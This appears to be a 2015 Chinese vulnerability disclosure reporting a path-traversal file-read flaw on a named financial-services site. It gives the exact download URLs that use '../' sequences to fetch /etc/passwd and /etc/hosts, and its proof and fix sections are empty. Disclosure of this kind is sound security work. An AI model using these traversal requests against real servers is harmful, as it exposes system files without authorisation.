财客在线某处任意文件读取漏洞
Chloe O_o发表于 2015-09-12 15:20:24
| 漏洞标题 | 财客在线某处任意文件读取漏洞 |
|---|---|
| 相关厂商 | 财客在线 |
| 漏洞作者 | 路人甲 |
| 提交时间 | 2015-07-29 22:07 |
| 公开时间 | 2015-09-12 22:08 |
| 漏洞类型 | 命令执行 |
| 危害等级 | 高 |
| 自评Rank | 20 |
| 漏洞状态 | 未联系到厂商或者厂商积极忽略 |
| Tags标签 | 补丁不及时,远程命令执行 |
漏洞详情
通过下载用户的一个XLS表格
获得下载地址:
http://zx.caakee.com/servlet/download?fileName=caakee_importAccount.xls
在filename参数写入../../../../../../../../../../etc/passwd
即可弹出下载
打开后
zx.caakee.com/servlet/download?fileName=../../../../../../../../../../etc/hosts
漏洞证明:
修复方案: